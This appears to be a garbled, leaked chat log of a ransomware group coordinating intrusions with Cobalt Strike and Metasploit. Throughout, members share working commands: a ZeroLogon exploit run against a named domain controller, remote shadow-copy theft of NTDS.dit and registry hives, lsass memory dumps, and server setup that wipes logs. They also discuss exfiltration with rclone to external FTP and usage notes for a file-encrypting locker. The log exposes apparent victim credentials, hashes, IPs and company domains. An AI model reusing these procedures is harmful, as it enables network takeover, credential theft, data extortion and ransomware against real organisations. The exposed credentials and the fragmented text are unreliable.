Unable to complete server challenge. Possible invalid name or network issues? beacon> execute-assembly C:\soft\SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch
[*] Tasked beacon to run .NET program: SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch
[+] host called home, sent: 114279 bytes
[+] received output:
Patching failedI had such an output I need time to test it I already sent it for rebuild We'll correct it and add to the toolchain a binary in the form of a dllcheck better sharpzerologon it is more reliable but in general we have a whip access so you can use sharpzeroLogon in the case recently was literally bumped yesterday
i can't help but wonder if the problem is solved and i don't give a fuck if it's working or not, but in the log above you can see there are a couple of errors and it doesn't seem to be working either, it's about zero.the zerologon's buildcheck doesn't work for me, it's better to dotnet in the toolchain and pavnin the binary should "crawl" and then say vulnerable or nottoday i'll throw someone check zerologon was able to run? how should the result look?
i can get it in testing, i can get the errors right here, but PLEASE leave one message so i don't get confused and there won't be messy@all:handshake:utilities bundle with the corresponding .cna scripts.
the documentation will be full within a couple days in pmsamopis ) if you use public obfuscator can give you a link to keep the copy number in the obfuscated command
cmd /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\\ & copy \?GGLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\\\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\
```
who has experience in obfuscating commands in cmd? i agree, thanks a lot. interesting way, thanks for the manuscript) if you have a problem with dumping ntds and dropping them from the net, try this way
he can burn only the fact of leaking data from the CD, and to analyze what exactly you have without knowing the password from the archive can not be thrown on the forum pokinutnost of this method is that we actually do not dump anything, we just take and pump ntds
not to be spotted when we dump the ntds we pack it into a password protected archive
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt"
```
query the shadows list, there's a date on it, check if it's recent
almost for sure they're already there, if not we'll do it ourselves
```
net start Volume Shadow Copy
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
```
then in shadow copy listing find most recent one
Shadow Copy Volume: \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55
Accordingly we need the copy number for the following command
```
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\"GGLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\\?
```
ntds.dit / security / system files should fall into c:\temp\log\
take the portable console 7z and pack it in the archive with the password
```
7za.exe a -tzip -mx5 \\DC01\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD
```
Download the patented archive to yourself, if you get an error (file is corrupted) when you decrypt the ntds file, do the following
```
Esentutl /p C:\log\ntds.dit
``If it's not too hard = )on the forum please = )for those who are too lazy to read I'll compile it``.
https://www.c0d3xpl0it.com/2016/10/dumping-ntdsdit-file-from-active-directory.html
```
here's the article I'll make a manual for removing ntds for everyone
I've never seen anything better, I made it myself based on what comrade Tony gave me
i finally found out i'm not the only one who's so fucking smart and after i did it i found this article from 2016 where the way 1 in 1 is described) i used msf to unlock it not so long ago but it was crooked. what other methods are used to unlock ntds? i assume the majority dumps via ntdsutil?
[x]error at JetAttachDatabase()
[x]can not load database: JET_errDatabaseDirtyShutdown, Database was not shut down cleanly. Recovery must first be run to properly complete database operations for the previous shutdown.
```
mb who managed to fix it? decrypt I can not, says the file is corrupted or something like thatanyone ntds dump damagi when removed through vssadmin create shadow? give the terms of reference that should write - will doAnyone here specializes in writing scripts for cobalt? need a little advice[ ] (https://stylebrooks.com/group/discussion?msg=P5HmD7mrt3JuN3i2k) or lazy)[ ] (https://stylebrooks.com/group/discussion?msg=QZCukbRTwecCABEp5) spared 100 bucks to regu on eksper (found on the expanse of the site.
"Dutch police registered on the forum of three letters and left a warning for all users. "here does not coo such a method, hidden files on the admin's machine do not even show them, although in fact through PS -hidden 2 files hangs a folder with the entire
then display hidden files
Complit7zSalam, guys
There is a question, anyone know how to pick up files with read-only access?
I'm talking specifically about the user keys in %APPDATA%\Microsoft\Protect\<SID>\.
To then pull the master key off of them[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=fqqqCgczHPnPxjZgq) how? I already wrote the server to me in pm I'll give it to the hoster let them deal with it. Is it working today?
``Wait, are you making progress?`` I know, me too) I'll give it to you today without anything else, I'll give you the server metasploit soon,`` 192.111.154.74
``````172.98.197.98
``I've got nothing) the dead disk where the msf was and the coba too``` 172.98.197.98
I``ve got nothing ! It's me without everything)``192.111.145.218
``Dedeepic is mine[ ](https://stylebrooks.com/group/cteam?msg=sxGizW3CZvz4WkgN7) )), but I got dumb under the msf server )oxmetasploit )I without dedik and mestamoy dedik
```192.111.149.26```
methinks what is it?) I just got the badge yesterday.
Guys who do not have dedicates and meth sign here those who have dedicates and ipses
``You have an account there....like everyone has an account...`` Do you have an account there...like естьԁг.hash@exploit.im...
200 usd per hash
3700@jabb.im
it's up to you
All hello, who can help with the ntlm hash brute force? if so - ldap queries through sox work you have to let the bot? maybe if not panicking will put the triggerPlease tell me, sentinel addfind panicking, no? everything worked, thank you
``beacon> shell nslookup 10.30.0.1
``Do nslookup dns server or something else? nmap? domain name is needed to get adfind off ``Ethernet adapter Ethernet 4:

   Connection-specific DNS Suffix :
   Description . . . . . . Fortinet SSL VPN Virtual Ethernet Adapter.
   Physical Address. . . . 00-09-0F-AA-00-01.
   DHCP Enabled . . . . No
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address . : fe80::6810:5a5e:bc36:b7b7%5(Preferred)
   IPv4 Address. . . . . .: 10.212.164.25(Preferred)
   Subnet Mask . . . : 255.255.255.255
   Default Gateway . . . . :
   DHCPv6 IAID . . . . . : 83888399
   DHCPv6 Client DUID . . . . : 00-01-00-01-28-5A-D0-32-00-15-5D-59-1A-00
   DNS Servers . . . . . : 10.30.0.2
                                       10.30.0.1
   NetBIOS over Tcpip. . . . .: Enabled
``how do you find the domain?)I have not encountered, but the text is something like either the path to the key file is not correct, or in the single config file it is not correctly entered into the hour and a halfPreviously bilds will update todayokayt slam clients date avazioni start preparing to merge databrandon fury ayr and flintintprevolutionary:zany_face:hello there guys all, here i am back, modem problems were, i'm back on lineLOGIN
kennethgevansecj_yah

PASSWORD
e9a2c5574445.91.11.22:300012.56.115.39:3000145.91.11.22:30001

LOGIN
kennethgevansecj_yah

PASSWORD
e9a2c55744

TYPE
HTTP(S)

AUTHORIZATION
by login/password62.96.194.146\\10.153.96.27\e$\MG-Mixedmayfair-grp\d_mg1201aa 22e?27%mQ1ut
corp-m\d_mg1201aa 22e?27%mQ1uta_mg1022mp Killer1986))))elefantkalinka and data all there and add me there add a new channel create there how to transfer@alex transfer to the new rocket on the second 44 days)10 days time of the computer watched?Although the koba not cleaned, but I want to note that the sessions are still dying in memory at night, after about 10-12 hours after creating a sessionjaskask * @alter please add jas tomorrow I will ask you to ... it should be time ... and cleaning will be? so dirty just downloaded myself artkit11mar.7z
put it in the scripts and generated it...
i just downloaded artkit11mar 7 z i prescribed it in the scripts and generated it... Windowsfed yelled and deleted it right away... i couldn't even run it if i recently updated it, but the StartW[ ](https://stylebrooks.com/group/cobalt_v42_patched?msg=k7wggjWn2SLtdqWfy) function is the same. how do you run this ddla remotely if it fails with one function and the other one fails?if you have a session as you write it flies and alive, the problem is where? is there magic in it? and why run the dll from the desktop? write the full path to the dllproblem is that with one function flies and another dies? the same... just rolls out the window with an error
error in dll.dll
missing entry: Control_RunDLLwhat kind of error is this if the session comes alive?) tryStartWhen you run the dll, the error flies out
error in dll.dll
missing entry: DllInstall - session arrives, but is dead instantly
missing entry: Control_RunDLL - session arrives alive :thumbsup:hey, if you have any problems with rising the ccsf session - welcome, there is a solution@all
cvmkfDe6Zh7tkWyKwljr2Z80cWSzWSHFTCxPd9OKFgvJsHhVxTdwaTgOd1EUJy12
whose? @all
cwf.fr
d-box.com
groupemontoni.com

owners of these cases - waiting for you@all
unionleader.com
thestaffzone.net

owners of these cases, please let me know how do you download them? do you download them as a packaged archive or just as a diru?
i can explain how to download from msfvenom and use it without tunneling through cobb who can explain how to make a session in msf without vpn-good manualls:thumbsup
i will test@red probably installed it the other way around, but not for sure on Ubuntu it all works yeah, it's better to install the current version@red here i foresee a problem ``apt-get install default-jdk
I showed you above how to set the TC for root, but I don't want to run the timeserver only as a user, here's my guide
1. Install the metasplot
	curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
		
		; ./msfconsole run the metasplot

2. Install Postgresql
	
	apt-get -y install postgresql
	
3. Installing Armitage

	wget http://fastandeasyhacking.com/download/armitage150813.tgz
	tar zxvf armitage150813.tgz

Initialize the metasplot base

	msfdb init

		; msfdb reinit - Deletes and reinitializes the database.
		; msfdb delete - Deletes the database.
		; msfdb start - Starts the database.
		; msfdb stop - Stops the database.
		; msfdb status - Shows the database status.

	export MSF_DATABASE_CONFIG=/home/%username%/.msf4/database.yml

5. Launch Armitage Teamserver

	cd /path/to/armitage
	./teamserver [external IP address] [password]
	

Useful Links

	Installing the Metasploit Framework -
		https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/
	Armitage installation -
		http://www.fastandeasyhacking.com/manual

Required Packages
``````
1. take debian or ubuntu dedic (ssh username@hostname)

Check availability of postgresql

sudo apt install postgresql

sudo apt-get -y install postgresql

============================================================================================================================
2. Download and install the metasplot
     
      x64
      wget http://downloads.metasploit.com/data/releases/archive/metasploit-4.16.2-2020011301-linux-x64-installer.run
      
     Next, we modify (allow the scripts to run)

      chmod +x metasploit-4.16.2-2020011301-linux-x64-installer.run

chmod +x metasploit-4.13.0-2017022101-linux-x64-installer.run

Далее установка ./metasploit-4.16.2-2020011301-linux-x64-installer.run


https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run

============================================================================================================================
Leave all default ports and add a random local domain

domain like addada.com

============================================================================================================================
4. After installing the msf

Installing the editor

sudo apt install nano

Editing scripts 1

      nano /etc/init.d/metasploit

      #exec /opt/metasploit/ctlscript.sh "$@"
      exec /opt/metasploit/postgresql/scripts/ctl.sh "$@"

Editing scripts 2

      nano /etc/rc.local add these lines before exit 0

ln -sf /dev/null /var/log/wtmp
ln -sf /dev/null /var/run/utmp
ln -sf /dev/null /var/log/lastlog
ln -sf /dev/null /var/log/auth.log
ln -sf /dev/null /var/log/btmp
ln -sf /dev/null /var/log/dmesg
ln -sf /dev/null /var/log/faillog
ln -sf /dev/null /var/log/kern.log
ln -sf /dev/null /var/log/syslog
ln -sf /dev/null /var/log/user.log
ln -sf /dev/null /var/log/secure
ln -sf /dev/null /root/.bash_history

iptables -A INPUT -i eth0 -p tcp -m tcp --dport 3790 -j DROP
============================================================================================================================
5. Set the java to make the armitage work

apt-get update && apt-get upgrade

apt-get install default-jdk
============================================================================================================================
6. Download and unpack the armitge (toolserver) from this url (tgz archive is up to date)
      wget http://fastandeasyhacking.com/download/armitage150813.tgz
      tar zxvf armitage150813.tgz
============================================================================================================================
7. Change the port in armitage (before running) in the teamserver script near the end of the file

nano armitage/teamserver
============================================================================================================================
8. Open screen (so that you can run armitage in the background and exit the server), and run

apt-get install screen

launch the screen

cd /root/armitage && ./teamserver IP PASS (the IP of the external interface of the dedicates and the pass is more complex)
============================================================================================================================
9. Wait until everything starts and a message appears with the credentials to armitage, and exit the screen with Ctrl+a and then separately d
============================================================================================================================
10. Change SSH password (passwd root ...)
============================================================================================================================
11. (change ssh port / make authorization by key to the server)

nano /etc/ssh/sshd_config
============================================================================================================================
``mkdir /opt/
cd /opt/
wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip
unzip 4.16.37.zip
mv metasploit-framework-4.16.37 metasploit-framework
sudo chown -R `whoami` /opt/metasploit-framework
cd /opt/metasploit-framework
gem install bundler
bundle install
cd /opt/metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'@atom easily if msf is properly installed
Help me raise the timserver from a normal position. you need a manual on how to raise the timserver, including this manual? but there is a problem with rights, I have not solved it in my own place. armitage guide ``http://www.fastandeasyhacking.com/manual
For 3 years now everyone has been writing on forums about this error with bundler and hems, which is why the java won't connect to you$ gem install bundler
I'll delete it later so it won't clog up the ether with this script
```
This tutorial is for Ubuntu.

the first thing we do is install nano, screen, unzip

sudo apt-get install nano screen unzip

Next, create file 1.sh:
nano 1.sh
Then insert the code block:

1. installing java (1.sh)
Code:

sudo apt-get update
sudo apt-get -y install --reinstall software-properties-common
sudo apt-get install default-jre
sudo apt-get update
sudo apt-get -y --force-yes install git build-essential unzip libreadline-dev zlib1g-dev nano screen libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
sudo apt-get update
sudo apt-get upgrade
cd ~
git clone git://github.com/sstephenson/rbenv.git
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

then CTRL+X (save) press Y ENTER ENTER
repeat the same for each item
set the rights:
chmod +x 1.sh
run 1.sh:
./1.sh
Now each command is executed in turn

2. installing ruby (2.sh)
Code:

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL

3. installing ruby (3.sh)
Code:

RUBYVERSION=2.4.3
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
ruby -v

4. installing nmap (4.sh)
Code:

mkdir ~/Development
cd ~/Development
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install
make clean

5. create a database and a database user. execute the commands in turn (without. nano):
Code:

su postgres
cd
createuser msf -P -S -R -D
#enter password qwe31337
createdb -O msf msf
exit

6. installing msf (5.sh)
Code:

mkdir /opt/
cd /opt/
wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip
unzip 4.16.37.zip
mv metasploit-framework-4.16.37 metasploit-framework
sudo chown -R `whoami` /opt/metasploit-framework
cd /opt/metasploit-framework
gem install bundler
bundle install
cd /opt/metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

7. installing armitage (6.sh)
Code:

echo cHJvZHVjdGlvbjoNCiBhZGFwdGVyOiBwb3N0Z3Jlc3FsDQogZGF0YWJhc2U6IG1zZg0KIHVzZXJuYW1lOiBtc2YNCiBwYXNzd29yZDogcXdlMzEzMzcNCiBob3N0OiAxMjcuMC4wLjENCiBwb3J0OiA1NDMyDQogcG9vbDogNzUNCiB0aW1Lb3V0OiA1DQo=|base64 --decode > /opt/metasploit-framework/config/database.yml
cd /opt/
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver


After installation, create a screen (to run in the background):
screen -dmS arm
screen -x arm
cd /opt/armitage/
Run ifconfig to check your IP
./teamserver TUT_API_WDSKI TUT_PASSWORD
``You're not clinging to it,`` for some reason your msf is crashing.
[*] Metasploit requires the Bundler gem to be installed
$ gem install bundler
``I don't even know how to comment on this, does it work? Has anyone encountered this error when starting armitage?
[*] Starting RPC daemon
[*] Metasploit requires the Bundler gem to be installed
    $ gem install bundler
[*] Sleeping for 20s (to let msfrpcd initialize)
[*] Starting Armitage team server
[*] Warning: checkError(): java.lang.RuntimeException: java.net.ConnectException: Connection refused (Connection refused) at server.sl:450schali it is,yes it puts both armagh and msf on BOX and msf should be on REMOTE BOXhttp://github.com/Matt-London/Install-Armitage-on-Linux what mushrooms are you eating?)))) it does not even need to install) and runs)) 100%armitage simply download) on the site armitage in the instructions are its installationa you armitage or a team serv? no, armitage is not through apt-get installed, and with a guitar if you do not care about the same download, there is armitage `` ``
sudo apt-get install armitage -y
cd Armitage
sudo pip3 install -r requirements.txt
sudo python3 armitage.py
```
like this on ubuntu for example koroche@slice have a suspiciona)most likely he meant the guide script for what? you can write a script yourself install it on wps? a few guys who works with armitage? ms17 - smb port
kerba - ldapfwd and without sox will work you need to throw portsox5 from polzak who started in the local area? very necessary, polzak context, crowdedstrike, 1 yes, you need at least ms17\kerbu\adfind. edr all jammed all ok) what are these numbers?@graf @slice thanksspro key I know about 5 years ago, it was so-so, now I'll try another activation key and cost 10 - 20 dollarsautokms in virustotal vgoniana any other than crack?) trust me a little too little to nimavtokms?:sweat_smile:except directly to activate))) who knows a working way to remove the activation banner windows? @red downloads may not work if the default address assigned to a domain from the Web, and he originally came through tornashel)-@red on the direct - probably because of e2e, disable it in the settings. How do I get the settings to work properly with downloads? Do not work direct-message, ie person writing in direct, he sees the notebook, but when you open the message is not, too, I'm interested in settings such as where and what to prescribe a servak[ ](https://stylebrooks.com/group/general?msg=Lo2gQrxif7BDytsLt) And this is from the corporation picked up, often found such charts, format ` `.vsdx ` ` and opened through VISIO ` Hey, and you yourself draw a diagram or is there any program? who is online
urgently!acunetix have you got a working one? sorry guys)understood on the "whole forest" it will only go with the wrong settings for the active directory for which you generatebecause it contains a specific domain sidgolden ticket works only in your domain's neprelekh can someone advise on kerberos::golden
created taqet, how now to connect them to the trust host? i will also take a) but later tonight will be) +1there is an urgent need to work@all have hands free? access flew fresh try to remove the backslash from the login, it escapes from this amputation
```
FC944FD5-6FA6-491F-B3AE-055AA04B8DE8 CASTCORP\Veeam_Admin AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380 21857372 2015-11 Veeam_Admin 1 2020-07-29 15:26:43.573
```
I leave only
```
Decrypt("CASTCORP\Veeam_Admin. AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380=");
why is csc.exe veeam.cs not working?
sql manament let's try either raise cobalt session and style token sklservsql manament studio poke the owner of your process "can't" in the subdialog from the context of an untrusted processwho had such an error when decrypting viam ?
```
Msg 916, Level 14, State 1, Server FRVEEAM02\VEEAMSQL2016, Line 1
The server principal "CASTCORP\CASTCJA" is unable to access the database "VeeamBackup" under the current security context.
Ookchutka late) off already Citrix) will be tomorrow) well, let's take it - see what there may be and rdp
there may be an opportunity to call citrix@alter there are cmd or rdp? @all there are willing to take citrixes to work thick? @all sicaf-cosmetiques.fr
I don't see any @alter hallite.com if it's ours) there's a bouncer there, are there any files from it@all hilite.com ? someone had it in work but bouncerfrance.fr - similarly looking for@all sicaf-cosmetiques.fr who has it ?
the link to exh sploittyp hashm auto-select or 256 I do not remember already can be determined by fucking a bunch in kmd5) looks like cha256akoy hash that should be on kmd5 in my opinion there hash cha512 like@alter ++++ someone knows how to decrypt passwords sonic?anyone can check if malwarebytes stalls on dinchek? +++++@all are there any fresh sonicdumpers no one has? by the way, no one has ever used wyrdguard+shadowsox? i wonder if vireguard is picking up in packages i just don't want to bother with it, i just did it quickly and moved on (when i have a virtual desktop with kali where it was already standing) no problem) the cat works under macAha and came to it, i wanted to fast from mac, i ended up using kali through thorns to the stars as i always do) i ditched it yesterday with johonin and never dumped kipass) and if kipass?i usually dump via the task manager,or mimicatu who has a compiled lsas dumper? guys who met this error in the installation of JohnTheRipper
 /usr/bin/ld: cannot find -lz
collect2: error: ld returned 1 exit status
make: *** [Makefile:1409: generic.h] Error 1@all

```
zCgwK2oXPvi3xkfs9TT4UVLcjvtW24j8PPlrLpOQuWcOkzQ5he9dKzk0Vjd4Vu
```
whose ``?
L24K!/3vTUft "*hQ^'A4
```
Download: https://qaz.im/load/iHynR4/sQkakd

fortivepn-brother, try who works with forts now if everything is ok+@all
https://labs.f-secure.com/tools/c3/vip72спасибо guys !``https://5socks.net/en_index.htm ``depending on what purpose to take proxies,you can also buy on white sites at proxy6 for example in lux have accessparni, need proxies to buy, but here I do not know where better, advised ``luxsocksruq3olxa.onion` `` here look, but there is too expensive - $ 500 just for the entrance ticket. Tip a couple of options, pleaseThere is no access, even if you try to spam a new session from YES
I need a token, but something prevents me from doing it, guys, has anyone run into this?
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir \\10.128.200.208\c$\programdata (token): 5
I'm not sure what's going on... I can't read the profile itself, I can't form it, there are guides available... i can't download files, no slips, no response, put a slip, then the file browser or downlaid files takes the slip and the session falls off for at least 2 3 minutes to 15 20 minutes, without smallable profiles seemed normal, will someone deal with this glitch because of profiles or because of weak VPN where koba runs? i got the profiles from git, maybe they need to configure, i do not know what to do there, thank you, alter asked to write to who is available to teammates, i have not done anything yet lokera lokera lokera lokera version? for lnx and ecys? preferably with pictures... because the language is a pain in the ass@all has anyone ever made a data backup from microsoft 365 from a browser? is there a manual without any software?super)weighs 70 kilobytes can work from memory i'll give you soon a rewritten copy of rklonablit the fucking coding yes soon ereisa rko support, in monitoring it makes no difference what you downloadWe always use rklon, got busted because of it 1 time and this moment was only because the threads were full, they had a network down... So we are safely pumping, but now the same as with fly the error occurs on the last case... We are trying to solve it. Before that everything was working fine and downloading. And the difference between filesilla with limited speed and pklon with limited speed seems to me not special. If the administrator is normal in the network, he and it will see, at least what kind of software, and if not monitor the network, it does not matter what software to download and without speed limits. My personal judgement) Hi.
Try another tool, filesilla banal.
We are in a few cases where we got burned, sin on rklon.
Filezilla is portable to an unused server, limit speed, run it from an unused user, minimize it to tray.Guys, here's the problem, RCLONE doesn't work. It's uploading to ftp. There is a connection to the FTP and directly pinged. Changed ports and users, hosts and dialers. Fuck no. Doesn't work with local or remote hosts.
I get this error:
``2021/04/21 20:37:39 ERROR : ftp://45.137.190.251:21/123: Error while Dialing 45.
137.190.251:21: dial tcp 45.137.190.251:21: connectex: A connection attempt failed
ed because the connected party did not properly respond after a period of time,
or established connection failed because connected host has failed to respond.
2021/04/21 20:37:39 Failed to create file system for "system:123": NewFs: ftpCon
nection Dial: dial tcp 45.137.190.251:21: connectex: A connection attempt failed
 because the connected party did not properly respond after a period of time, or
 established connection failed because connected host has failed to respond.``

In other networks everything works, double-checked 10 times.https://www.pdf2go.com/ru
french from a PNG picture is fine in text, but so far I found one option... make a printscreen, cut off the name of the company in Paint and fill it in as it is, they are all fucking crooked.Can you suggest offline editors of pdf files, to pull the text from a scanned document.
i can't upload to googledocs and the like since almost every scan has the name of the company on it, that's why i was surprised
there seems to be some bug of the cp was, before this run through the console was an error, then tried through the graphical interface - everything is even[ ](https://stylebrooks.com/group/discussion?msg=hTSKWcujXQ2RQfZoS) but the session from the system or another user ?reset the current token first ``$krb5tgs$23$*14082020Yuri__sqlservice$VTAORTHO.com$MSSQLSvc/VOGDBN02.VTAORTHO.com:1433*$:ventura600650
```$krb5tgs$23$*14082020Yuri__sqlservice$VTAORTHO.com$MSSQLSvc/VOGDBN02.VTAORTHO.com:1433*$:ventura600650+++VasyaPypkin+))+))no, who is "here" I see))) no questions to you)))) here we are here)let's keep to the schedule still, otherwise we will get bogged down in long cashes)gentlemen, 15 hours, and where everyone? = )airsronon got it, sorry expansion zagulutak what is it? have a value? and the title is not clear just go there ?.CSR - what is the file? https://github.com/pandasec888/taowu-cobalt-strike/tree/englishнажми there is a version of it there are good chinese, first the palm, now this one pulls where the other does not pulla clear scriptchrome ff edge
there's a lot of stuffhttp://github.com/pandasec888/taowu-cobalt-strike found the solution in the aggressor script now I'll tell you what kind of browser by the way+hey guys!
who can help me crypt the eczeshnik, please give me a plus sign or knock in pm)
thankshttp://gist.github.com/HarmJ0y/dc379107cfb4aa7ef5c3ecbac0133a02 there's a chance that I myself will not build)never had to export passes from therewhen build - tell me =) https://github.com/GhostPack/SharpDPAPIhttps://blog.elcomsoft.com/2020/04/extracting-passwords-from-microsoft-edge-chromium/есть some kind of program which gets passes from the Edge like sharkhrom? Fury ``before lock check list of vm on esxi, not to be mistaken, you can (esxi shell command)
vim-cmd vmsvc/getallvms``````
Unix version startup options

--path
     If this parameter is used, the locker will encrypt files at the specified path. This parameter is obligatory, without it the locker won't encrypt anything.
     ./encryptor --path /path
     
--prockiller
     Kills all processes which interfere with opening files.
     ./encryptor --path /path --prockiller
     
--log
     Enables logging of all actions and errors
     ./encryptor --path /path --log /root/log.txt
     
--vmkiller(For esxi only)
     Turns off all virtual machines
     
--vmlist(For esxi only)
     Sets a file with a list of virtual machines that should not be shut down. One line for each VM
     ./encryptor --path /path --vmkiller --vmlist /tmp/list.txt

--detach
      Disconnects the process from the terminal.
So that if an ssh session crashes, the locker will keep working
And the files won't get corrupted.

ESXi version SHOULD BE REQUIRED separately


If it doesn't start somewhere, I need os, kernel version and glibc version
/lib64/libc.so.6
``webroot stalls the dllinject under cobalt
does the balloon pan? has anyone tested it in the last 2-4 weeks? yeah ok give me the full composition of hell from here
kennethgevansecj_yah

PASSWORD
e9a2c5574445.91.11.22:300012.56.115.39:3000145.91.11.22:30001

LOGIN
kennethgevansecj_yah

PASSWORD
e9a2c55744

TYPE
HTTP(S)

AUTHORIZATION
by login/password62.96.194.146\\10.153.96.27\e$\MG-Mixedmayfair-grp\d_mg1201aa 22e?27%mQ1ut
corp-m\d_mg1201aa 22e?27%mQ1uta_mg1022mp Killer1986))))друзья
Who can share how to make a link to the coba (for phishing emails) on the wind easier to use the link above, which I threw the technologist, but with linux, I personally dances with tambourine onlipoka left this venture, will now archive and through the coba to pump out if rdp not allowed to use and so tried and different clients, because I was worried about remmina-try it both ways
i had a similar network and it was running fine, i don't know why i can't use it from the car where you connected to ipac or hostname, you don't need to use socket in general if you are connected to ipac, i don't need to use pinging but i checked port 3389 from harp
[+] 10.0.1.29: - 10.0.1.29:3389 - TCP OPEN
so packets get through
i have a good connection to proxychains and i don't know how to use proxies on this machine but i am not sure if it is right, i am asking you to correct it, are the proxies valid and is the proxies on it?i got it, he is connected to the local loop, and if you use a proxy through the cobs, it's like you are already in the local loop ok, i will try it outhz what could be the problem with analogueswas exactly the same problem recently, solved only with the help of a native rddmstsc also tried ((i had such a problem, neither hrdp, not remina, not freerdp did not want to connect, try to connect through a regular rdp which is on the wind, and proxy through profixier, it should connectProbably it is not only on this server on several others the same situationproblem with connection through the rdp?what the problem could be ?
help to understand, i was going to download information today, the situation is as follows:
[+] 10.0.1.29: - 10.0.1.29:3389 - TCP OPEN
port open

[+] 10.0.1.29:445 - 10.0.1.29:445 - Success: 'ppmhc\2572cc:Bigdaddy2' Administrator
smb login

I can't log on to the host using remmina, when I try to log on I get a certificate, but nothing beyond the certificate

a few lines of proxychains output
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - [length=16]
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - MsvAvTargetName AvId: 9 AvLen: 3663300576
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - 0000 54 00 45 00 52 00 4d 00 53 00 52 00 56 00 2f 00 T.E.R.M.S.R.V./.
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - 0016 31 00 30 00 2e 00 30 00 2e 00 31 00 2e 00 37 00 1.0...0...1...7.
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - 0032 37 00 7.
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - [length=34]
[10:59:13:037] [85132:87227] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
libfreerdp returned code is 00000000cm confueto alfaraa. i've already raised the rights here...context give it yourEHe's not mashing at all. delete rename, set the rights - no way. citrix > LPE trying to poke around
charpAp gave this up:what would the log be clear of the sessionis there a command to clear the console of the bicon specifically? let me try it,this is all about the remote machine,right? dump and drag...you can do tasklist on the machine, find out the PID of the process there and so in the lsass NTLM hash + mb cleartext pass + hashdump analog you can do this then mimic read624 - PID lsassa for example you can ``rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
